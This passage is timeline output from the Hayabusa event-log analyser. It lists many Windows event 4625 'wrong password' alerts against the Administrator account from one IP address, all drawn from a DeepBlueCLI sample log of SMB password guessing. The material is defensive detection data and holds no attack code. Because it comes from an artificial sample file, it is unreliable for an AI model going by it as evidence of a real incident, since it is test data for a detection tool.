NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iPUiW0vFQB405kwS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OtcZ4ymkeLHeU7YJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZxZCDKWtqkGJ0dnw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f4GGnhttZgmRPRJo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gI0j9w45eXEFeex3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BVZ2YRDUAOsNgKxo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJfIpxlcwVf7pWga : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Oerixd9ODF6fslsC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbJC5yvrIymYgaHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.951 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4schZcUP8Im8Ee1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WotargyGlEq9PBch : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2JSMrPoucOR0nzlD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jr4w4uoF2DVZ5n9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v319oZIaOBpuf542 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GNRTL9BLlGWMx6dA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zHlDIOZ9B5uY8Rzz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dr2bvAue8mr5kagX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXBds9GoXr6IZUfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aLYuegjXO18lo342 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: To3MMEEvNXKNjKHT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N0HCToTmh3ESGBYt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nNvBueVo3ANNmSSN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mVWOoAG5ermGL2Gl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W7QYJUNPm5b4jprh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PHllwNJvpH3P97cp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tfT8GtafHGYMlkMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nab7wtZfBVkcynsa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHiijj7sT9nyqxii : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v06kkhqYNOyEHx2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WSTDX16YK5Zgkjxo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u6QWEyTrpndCagP0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7iCaXa5SR5IHJnQA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DNZhcPd1JaNFZMYG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LeOIg10KS60QplWz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: um3Nwo2doDbKJJvz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JuoqbUwc2Nth1xlH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WF8zKIbeboTLLkC6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kSyKc8igfuYLMekV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LHog0TdOci9CCKBa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R5ilFaQlemZUSNun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOJnv9vFdqr2VSQC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rXaoVN7FvJ5rRDUF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kaFCT5QYFfmJpEC1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kOdVfL4XUTLp60tC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wFQSXjz0JTlkwpBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgAVlnENp6IzRRDr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JLkeKKFVP5vJjPtl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EqLXdGmr45vGpu3E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m7uTpMLqPgenJdRb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FQn7NqRzpGtjQdfv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8F8EZLHQtEWkeob1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5joxW81M9vcAfbJw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iMfmQF3xsaV5SQVZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQe9VL8eeco0SdPW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MnMbxQEuczrnMLKc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3DWOiTIp6JQLq9Vz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E1ORteg467kiFxmD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EoVhHZ2lkyAEx0w9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMSqYaVVGR5v3bXr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hEEJ05nL0lyatWKL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SgrcS1NqwVJSEv31 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CCNTu1A6c6myngXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YLx5Hv5GmdvsO9SE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtS3KUkTVoAWGqbW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7DxfDEwc6ykrmddu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m8yKyocZwOY574pe : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfdmcsxnDHRxJYAA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: euxBOcdse8NjSzTd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dw7RZh5jKuRcM1xw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zIyozsYA1Mn27gl7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhJopROjHZi6T8aF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QZ6XuZO6fIMg52tV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tvAYEepvDwz93ezW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Er95vLjet49OmSQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OKkMGZ5on5L26cip : IP Address: 192.168.198.149 : AuthPackage: 